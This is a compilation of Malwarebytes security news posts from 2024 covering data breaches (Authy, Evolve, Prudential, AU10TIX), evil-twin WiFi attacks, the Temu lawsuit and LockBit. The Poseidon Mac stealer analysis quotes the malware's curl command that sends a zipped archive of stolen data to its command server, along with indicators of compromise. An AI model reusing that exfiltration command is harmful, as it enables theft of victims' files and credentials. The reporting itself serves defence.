Authy users have been warned that their phone numbers have been obtained by cybercriminals that abused an unsecured API endpoint.

Twilio has warned users of the Authy multi-factor authentication (MFA) app about an incident in which cybercriminals may have obtained their phone numbers.

Twilio said the cybercriminals abused an unsecured Application Programming Interface (API) endpoint to verify the phone numbers of millions of Authy multi-factor authentication users.

Authy is an app that you install on your device which then produces a MFA code for you when logging into services.

The cybercriminals were able test the validity of an enormous list of phone numbers against the unsecured API endpoint. If the number was valid, the endpoint would return information about the associated accounts registered with Authy.

Twilio says it has seen no evidence of the attackers gaining access to Twilio’s systems or other sensitive data, but as a precaution it is asking all Authy users to update to the latest Android and iOS apps.

BleepingComputer notes that a threat actor named ShinyHunters leaked a CSV text file containing what they claim are 33 million phone numbers registered with the Authy service.

> “In late June, a threat actor named ShinyHunters leaked a CSV text file containing what they claim are 33 million phone numbers registered with the Authy service.”

In that post, ShinyHunters suggests that buyers combine the data set with those leaked in the Gemini or Nexo data breaches. Nexo is a crypto platform where users can buy, exchange, and store Bitcoin and other cryptocurrencies. Gemini is another cryptocurrency exchange which has suffered several breaches in the past years.

With matches between the data sets, a cybercriminal could engage in SIM-swapping or phishing attacks to steal the target’s cryptocurrencies.

If you are an Authy user we advise you to update at your earliest convenience and keep an eye out for any potential phishing messages.

**How to avoid being phished**

Remember that phishing messages will try to rush you into making a decision by setting an ultimatum or otherwise imposing a sense of urgency. Don’t let them rush you into an expensive mistake.

There are a few tell-tale signs for phishing mails:

1.  It asks you to update/fill in personal information.
2.  The URL on the email and the URL that displays when you hover over the link are different from one another.
3.  The “From” address is not the legitimate address, although it may be a close imitation.
4.  The formatting and design are different from what you usually receive from the impersonated brand.
5.  The email contains an attachment you weren’t expecting.

However, with the advancement of AI, phishing emails are getting more sophisticated. So if you have even a tiny amount of suspicion that something is phishy, don’t hesitate to confirm the source of the email through another method. The chances of losing your money are much smaller after a quick call asking “Did you send this?”

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Authy phone numbers accessed by cybercriminals, warns Twilio 

Buy now and pay later provider Affirm has notified the SEC that customer data of its card users was compromised in the Evolve data breach.

‘Buy now, pay later’ payment specialist Affirm has warned that holders of its payment cards had their personal information exposed after a ransomware attack and data breach at Evolve Bank & Trust.

In a form 8-K, submitted to the Securities and Exchange Commission (SEC), Affirm states:

> “Because the Company \[Affirm Holdings, Inc\] shares the Personal Information of Affirm Card users with Evolve to facilitate the issuance and servicing of Affirm Cards, the Company believes that the Personal Information of Affirm Card users was compromised as part of Evolve’s cybersecurity incident.”

According to Evolve, the attack started after “an employee inadvertently clicked on a malicious internet link.” Evolve refused to pay the ransom, and so the attackers leaked the data they downloaded.

Affirm isn’t the only fintech company affected by the Evolve breach. Business bank Mercury also notified customers that the data stolen from Evolve Bank & Trust included some account numbers, deposit balances, business owner names, and emails associated with Mercury and other fintech accounts.

> “Affected Mercury customers have been notified of the breach and the preventative steps we are taking to keep customer funds secure.”

Money transfer service and payment platform builder Wise also published a statement on its website, informing customers it had shared full names, addresses, contact details, Social Security numbers, and other sensitive information with Evolve as part of a partnership between 2020 and 2023.

So, it’s entirely possible that other financials may come forward with similar notifications. Reportedly, Evolve has active partnerships with multiple fintech companies, including Shopify, Bilt, Plaid, and Stripe.

Keep your eyes and ears open and be wary of phishing attempts related to these breaches.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**Check your digital footprint**

Malwarebytes has a free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

 Affirm says Evolve Bank data breach also compromised some of its customers 

It turns out that a breach at the Prudential impacted a lot more people than was initially thought. The company is now offering identity monitoring to affected customers.

In February 2024, Prudential Financial reported it had fallen victim to a ransomware attack. The attack was discovered one day after it started, but not before some 2.5 million people had been impacted by the resulting data breach.

As one of the largest insurance companies in the US, Prudential employs 40,000 people worldwide and reported revenues of over $50 billion in 2023.

At first, Prudential said it believed only 36,000 people had had their data stolen, but that number has now been revised to 2.5 million in a new breach notification. The company has also adjusted what information has stolen. In the original notification the company stated:

> “On the basis of the investigation to date, we do not have any evidence that the threat actor has taken customer or client data.”

However, Prudential is now saying the stolen data also impacted many customers and included:

*   Full names
*   Driving license numbers
*   Non-driving license identification cards

The data breach notification states that the company will be giving affected customers 24 months of identity theft and credit monitoring services through Kroll.

Below are some general tips on what to do after you’ve fallen victim to a data breach.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Malwarebytes has a free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Prudential Financial data breach impacts 2.5 million people, not 36,000 as first thought 

An Australian man was arrested for alleged evil twin attacks. What are they and what can you do about them?

The Australian Federal Police (AFP) have charged a man for setting up fake free WiFi access points in order to steal personal data from people.

The crime was discovered when an airline reported a suspicious WiFi network identified by its employees during a domestic flight. When the alleged perpetrator landed at Perth airport, his bags were searched and authorities found a portable wireless access device, a laptop, and a mobile phone in his hand luggage.

The police say that the man, 42, used a portable wireless access device to create ‘evil twin’ free WiFi networks; so called because criminals set up free WiFi access points that mimic the name of legitimate public WiFi networks.

When people tried to connect their devices to the free WiFi networks, they were taken to a fake webpage requiring them to sign in using their email or social media logins. Those details were then allegedly saved to the man’s devices.

The email and password details harvested could then be used to access more personal information, including bank accounts, emails and messages, photos and videos, and more. 

AFP cybercrime investigators have identified data relating to the use of the alleged fraudulent WiFi pages at airports in Perth, Melbourne and Adelaide, on domestic flights, and at locations linked to the man’s previous employment.

The investigation is ongoing but the man can expect to face nine charges for the alleged cybercrime offences.

‘Evil twin’ attacks are a type of “machine-in-the-middle” attack, where all traffic is routed through a server under the attacker’s control, giving them access to all of the submitted information.

Cybercriminals favour places where people expect to have free WiFi, such as airports, planes, coffee, shops, and libraries. The attacker finds the legitimate network name—known as the SSID (service set identifier)—and creates an access point with the same name.

Access points and wireless router networks broadcast their SSIDs to identify themselves, but the identifiers are not unique. Your device can connect to any SSID if the network has no security options enabled, and it will not be able to differentiate between the legitimate and the fake one.

Evil twin attacks are based on the fact that when two networks have the same SSID and security settings, your device will either connect to the one with the strongest signal or the one it sees first.

**How to stay safe from evil twin attacks**

There are a few things you can do to protect yourself against this kind of attack.

*   Firstly, do not allow your device to auto-connect to public or unsecure networks. See below on how to turn this off.
*   Look out for unexpected behavior. To connect to a free WiFi network, you shouldn’t have to enter any personal details—such as logging in through an email or social media account.
*   Install a trusted VPN to encrypt the traffic regardless of the network you are using, and even when you’re not visiting websites that HTTPS (Hypertext transfer protocol secure) which encrypts the traffic between a browser and the website.
*   And my personal favorite: Use your own personal hotspot. I use a portable 5G Mifi router, which provides me with reliable high-speed WiFi throughout my domestic journeys.

**How to disable auto-connect**

When you’re travelling it may be safer to disable auto-connect on Wi-Fi altogether.

On Android it works roughly like this (steps may be slightly different depending on your Android version, device type, and vendor):

**Settings** > **Network & Internet** (or **Connections**) > **Wi-Fi** > **Wi-Fi preferences** (or **Advanced**). Toggle off **Connect to public networks**.

On iOS you can disable auto-connect by doing this:

**Settings** > **Wi-Fi**. Tap the **(i)** next to the network name and then toggle off **Auto-Join**.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Personal data stolen from unsuspecting airport visitors and plane passengers in “evil twin” attacks, man charged 

This week on the Lock and Code podcast, we speak with Sarah Lamdan about library privacy and the fight to stop big data surveillance.

_This week on the Lock and Code podcast_…

More than 20 years ago, a law that the United States would eventually use to justify the warrantless collection of Americans’ phone call records actually started out as a warning sign against an entirely different target: Libraries.

Not two months after terrorists attacked the United States on September 11, 2001, Congress responded with the passage of The USA Patriot Act. Originally championed as a tool to fight terrorism, The Patriot Act, as introduced, allowed the FBI to request “any tangible things” from businesses, organizations, and people during investigations into alleged terrorist activity. Those “tangible things,” the law said, included “books, records, papers, documents, and other items.”

Or, to put it a different way: things you’d find in a library and records of the things you’d check out from a library. The concern around this language was so strong that this section of the USA Patriot Act got a new moniker amongst the public: “The library provision.”

The Patriot Act passed, and years later, the public was told that, all along, the US government wasn’t interested in library records.

But those government assurances are old.

What remains true is that libraries and librarians want to maintain the privacy of your records. And what also remains true is that the government looks anywhere it can for information to aid investigations into national security, terrorism, human trafficking, illegal immigration, and more.

What’s changed, however, is that companies that libraries have relied on for published materials and collections—Thomson Reuters, Reed Elsevier, Lexis Nexis—have reimagined themselves as big data companies. And they’ve lined up to provide newly collected data to the government, particularly to agencies like Immigrations and Customers Enforcement, or ICE.

There are many layers to this data web, and libraries are seemingly stuck in the middle.

Today, on the Lock and Code podcast with host Davd Ruiz, we speak with Sarah Lamdan, deputy director Office of Intellectual Freedom at the American Library Association, about library privacy in the digital age, whether police are legitimately interested in what the public is reading, and how a small number of major publishing companies suddenly started aiding the work of government surveillance:

> “Because to me, these companies were information providers. These companies were library vendors. They’re companies that we work with because they published science journals and they published court reporters. I did not know them as surveillance companies.”

Tune in today to listen to the full conversation.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.**

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

 Busted for book club? Why cops want to see what you&#8217;re reading, with Sarah Lamdan (Lock and Code S05E14) 

A list of topics we covered in the week of June 24 to June 30 of 2024

June 28, 2024 - The Arkansas Attorney General filed a lawsuit against webshop Temu for allegedly being dangerous malware which is after personal data.

June 27, 2024 - Researchers have found an online repository leaking sensitive data, including driving licenses and other identity documents.

June 27, 2024 - A competitor of the infamous Atomic Stealer targeting Mac users, has just launched a new campaign to lure in more victims.

June 26, 2024 - LockBit claimed to have breached Federal Reserve but in fact the data came from Evolve Bank & Trust

June 26, 2024 - Malwarebytes Premium blocked 100% of malware during the most recent testing by the AV Lab Cybersecurity Foundation.

 A week in security (June 24 &#8211; June 30) 

The Arkansas Attorney General filed a lawsuit against webshop Temu for allegedly being dangerous malware which is after personal data.

Chinese online shopping giant Temu is facing a lawsuit filed by State of Arkansas Attorney General Tim Griffin, alleging that the retailer’s mobile app spies on users.

> “Temu purports to be an online shopping platform, but it is dangerous malware, surreptitiously granting itself access to virtually all data on a user’s cellphone.”

Temu quickly denied the allegations.

In speaking with the outlet Ars Technica, a Temu spokesperson said “the allegations in the lawsuit are based on misinformation circulated online, primarily from a short-seller, and are totally unfounded.”

According to Baclinko statistics, Temu was the most downloaded shopping app worldwide in 2023, with 337.2 million downloads, 1.8x more than Amazon Shopping, and according to TechCrunch, Temu was the most downloaded free iPhone app in the US for 2023.

Temu is most popular today likely for its exceedingly low prices (a brief scan of its website shows a shoulder-sling backpack being sold for $2.97, and a broom-and-dust–pan combo for $12.47). How those low prices are achieved has been a mystery for some onlookers, but current theories include:

*   Temu relies on the de minimis exception to ship goods directly to U.S. customers for a low price. A shipment below the de minimis value of $800 isn’t inspected or taxed by US Customs.
*   The online webshop pressures manufacturers to lower their prices even further to appease discount-seeking customers, leaving those manufacturers with little to no profit in return.
*   Most items sold on Temu are unbranded and manufactured en masse by manufacturers in China. Almost every tech product on Temu is a knockoff or “dupe” of a real, brand-name product.

But according to reporting last year from Wired, Temu’s low prices are easy to decipher—Temu itself is losing millions of dollars to break into the US market.

“An analysis of the company’s supply chain costs by WIRED—confirmed by a company insider—shows that Temu is losing an average of $30 per order as it throws money at trying to break into the American market.”

Attorney General Griffin seems determined that Temu baits users with misleading promises of discounted, quality goods and adds addictive features like wheels of fortune to keep users engaged to the app.

He called Temu “functionally malware and spyware,” adding that the app was “purposefully designed to gain unrestricted access to a user’s phone operating system.”

The lawsuit claims that Temu’s app can sneakily access “a user’s camera, specific location, contacts, text messages, documents, and other applications.” Further, the lawsuit alleges that Temu is capable of recompiling itself, changing properties, and overriding the data privacy settings set by the user. If true, this would make it almost impossible to detect, even by “sophisticated” users, the lawsuit said.

Some may suspect that this is another attempt to ban an app hailing from a “foreign adversarial country” like TikTok, but Attorney General Griffin is very clear about his reasons.

“Temu is not an online marketplace like Amazon or Walmart. It is a data-theft business that sells goods online as a means to an end.”

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 TEMU sued for being &#8220;dangerous malware&#8221; by Arkansas Attorney General 

Researchers have found an online repository leaking sensitive data, including driving licenses and other identity documents.

A company that helps to authenticate users for big brands had a set of administration credentials exposed online for over a year, potentially allowing access to user identity documents such as driving licenses.

As more and more legislation emerges requiring websites and platforms—like gambling services, social networks, and porn sites—to verify their users’ age, the requirement for authentication companies offering that service rises.

You may never have heard of the Israeli based authentication company, AU10TIX, but you will certainly recognize some of its major customers, like Uber, TikTok, X, Fiverr, Coinbase, LinkedIn, and Saxo Bank.

AU10TIX checks users’ identities via the upload of a photo of an official document.

A researcher found that AU10TIX had left the credentials exposed, providing 404 Media with screenshots and data to demonstrate their findings. The credentials led to a logging platform containing data about people that had uploaded documents to prove their identity.

Whoever accessed the platform could peruse information about those people, including name, date of birth, nationality, identification number, and the type of uploaded document such as a drivers’ license, linking to an image of the identity document itself.

Research showed that the likely source of the credentials was an infostealer on a computer of a Network Operations Center Manager at AU10TIX.

Stolen credentials have shown to be a major source of breaches like those recently associated with Snowflake. Snowflake pointed to research which found that one cybercriminal obtained access to multiple organizations’ Snowflake customer instances using stolen customer credentials.

Another major problem is that these sets of credentials get traded and sold all the time. And it’s not as if when you sold them once, that’s it. Digital information can be copied and combined endlessly, leading to huge data sets that criminals can use as they see fit.

We’ve talked about the dangers of data brokers in the past. The California Privacy Protection Agency (CPPA) defines data brokers as businesses that consumers don’t directly interact with, but that buy and sell information about consumers from and to other businesses. There are around 480 data brokers registered with the CPPA. However, that might be just the tip of the iceberg, because there are a host of smaller players active that try to keep a low profile.

Either way, for any company and particularly an authentication company working with sensitive data, having such an account accessible with just login credentials should be grounds for serious penalties.

In a statement given to 404 Media, AU10TIX said it was no longer using the system and had no evidence the data had been used:

> “While PII data was potentially accessible, based on our current findings, we see no evidence that such data has been exploited. Our customers’ security is of the utmost importance, and they have been notified.”

For now, there’s not much that individual users of the brands can do apart from keep an eye out for any official statements, and consider an ongoing identity monitoring solution. Below are some general tips on what to do if your data has been part of a data breach:

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

****Check your personal data exposure****

You can check what personal information of yours has been exposed on our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

 Driving licences and other official documents leaked by authentication service used by Uber, TikTok, X, and more 

A competitor of the infamous Atomic Stealer targeting Mac users, has just launched a new campaign to lure in more victims.

On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads.

The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer competitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously tracking this payload as **OSX.RodStealer**, in reference to its author, Rodrigo4. The threat actor rebranded the new project ‘Poseidon’ and added a few new features such as looting VPN configurations.

In this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum announcement, to the distribution of the new Mac malware via malvertising.

**Rodrigo4 launches new PR campaign**

A threat actor known by his handle as Rodrigo4 in the XSS underground forum has been working on a stealer with similar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel with statistics and a builder with custom name, icon and AppleScript. The stealer offers functionalities reminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser data collector.

In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:

Forum post by Rodrigo4 on XSS

Hello everyone, we have released the V4 update and there are quite a lot of new things.  
The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn’t know who we were.

Malware authors do need publicity, but we will try to stick to the facts and what we have observed in active malware delivery campaigns.

**Distribution via Google ads**

We saw an ad for the Arc browser belonging to ‘Coles & Co’, linking to the domain name _arcthost\[.\]org_:

Malicious ad for Arc browser via Google search

People who clicked on the ad were redirected to _arc-download\[.\]com_, a completely fake site offering Arc for Mac only:

Decoy website for Arc

The downloaded DMG file resembles what one would expect when installing a new Mac application with the exception of the right-click to open trick to bypass security protections:

Malicious Arc DMG installer

**Connection to new Poseidon project**

The new “Poseidon” stealer contains unfinished code that was seen by others, and also recently advertised to steal VPN configurations from Fortinet and OpenVPN:

Excerpt from forum post featuring new VPN capability

More interesting is the data exfiltration which is revealed in the following command:

set result\_send to (do shell script \\"curl -X POST -H \\\\\\"uuid: 399122bdb9844f7d934631745e22bd06\\\\\\" -H \\\\\\"user: H1N1\_Group\\\\\\" -H \\\\\\"buildid: id777\\\\\\" --data-binary @/tmp/out.zip http:// 79.137.192\[.\]4/p2p\\")

Navigating to this IP address reveals the new Poseidon branded panel:

Poseidon panel login page

**Conclusion**

There is an active scene for Mac malware development focused on stealers. As we can see in this post, there are many contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that their product is feature-rich and has low detection from antivirus software.

Seeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new victims. Staying protected against these threats requires vigilance any time you download and install a new app.

Malwarebytes for Mac detects this this ‘Poseidon campaign as _**OSX.RodStealer**_ and we have already shared information related to the malicious ad with Google. We highly recommend using web protection that blocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard does both effectively.

**Indicators of Compromise**

Google ad domain

arcthost\[.\]org

Decoy site

arc-download\[.\]com

Download URL

zestyahhdog\[.\]com/Arc12645413\[.\]dmg

Payload SHA256

c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05

C2

79.137.192\[.\]4/p2p

 &#8216;Poseidon&#8217; Mac stealer distributed via Google ads 

LockBit claimed to have breached Federal Reserve but in fact the data came from Evolve Bank & Trust

A shockwave went through the financial world when ransomware group LockBit claimed to have breached the US Federal Reserve, the central banking system of the United States.

On LockBit’s dark web leak site, the group threatened to release over 30 TB of banking information containing Americans’ banking data if a ransom wasn’t paid by June 25:

LockBit leak site

> “Federal banking is the term for the way the Federal Bank of America distributes its money. The Reserve operates twelve banking districts around the country which oversee money distribution within their respective districts. The twelve cities which are home to the Reserve Banks are Boston, New York City, Philadelphia, Richmond, Atlanta, Dallas, Saint Louis, Cleveland, Chicago, Minneapolis, Kansas City and San Francisco.
> 
> 33 terabytes of juicy banking information containing American’s banking secrets.”

The statement ends expressing the group’s disappointment about a negotiator who apparently offered to pay $50,000.

So, you can imagine that everyone was anticipating the end of the countdown that signalled the release of the stolen data with bated breath.

However, when that deadline passed and the data was released, people who looked at the data found it did not, in fact, belong to the Federal Reserve but instead to a particular financial organization: Evolve Bank & Trust.

Overview of the available data

All the links lead to directories containing data that seems to belong to Evolve.

There hasn’t been enough time to do a full analysis of the huge amount of data, but it appears it is only remotely tied to the Federal Reserve by some included links to a Federal Reserve press link from mid-June.

At that time, the US Federal Reserve Board penalized Evolve Bancorp and its subsidiary, Evolve Bank & Trust, for multiple “deficiencies” in the bank’s risk management, anti-money laundering (AML) and compliance practices.

According to the Federal Reserve statement released at the time:

> “In addition, Evolve did not maintain an effective risk management program or controls sufficient to comply with anti-money laundering laws and laws protecting consumers.”

So, as expected, LockBit drew a lot of attention under false pretences.

The group was disrupted by law enforcement in February of 2024 and their activity diminished as a result. As the ThreatDown monthly ransomware review of May review pointed out:

> “While LockBit is technically still alive, it’s fair to say the group is not what it was: Not only are its attacks dwindling, but in early May law enforcement also revealed the identity of alleged LockBit leader Dmitry Khoroshev, aka LockBitSupp. LockBitSupp, who is now subjected to a series of asset freezes and travel bans, also has a reward of up to $10 million over his head for information that leads to his arrest.”

And recently the FBI announced it had over 7,000 LockBit decryption keys in its possession, allowing it to help victims to recover data encrypted by the gang in past attacks. LockBit ransomware has impacted over 1,800 US victims, according to FBI stats.

Back to the data, it’s good news it appears not to be from the Federal Reserve. However, it’s not good news for customers of Evolve Bank & Trust and their data may well have been stolen and published. And it’s a lot of data.

A lot of data

We’ll keep you updated on this developing story. For now, there’s no official statement from Evolve, but there are general things to know if you think you have been involved in a data breach.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Malwarebytes has a new free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Source

Malwarebytes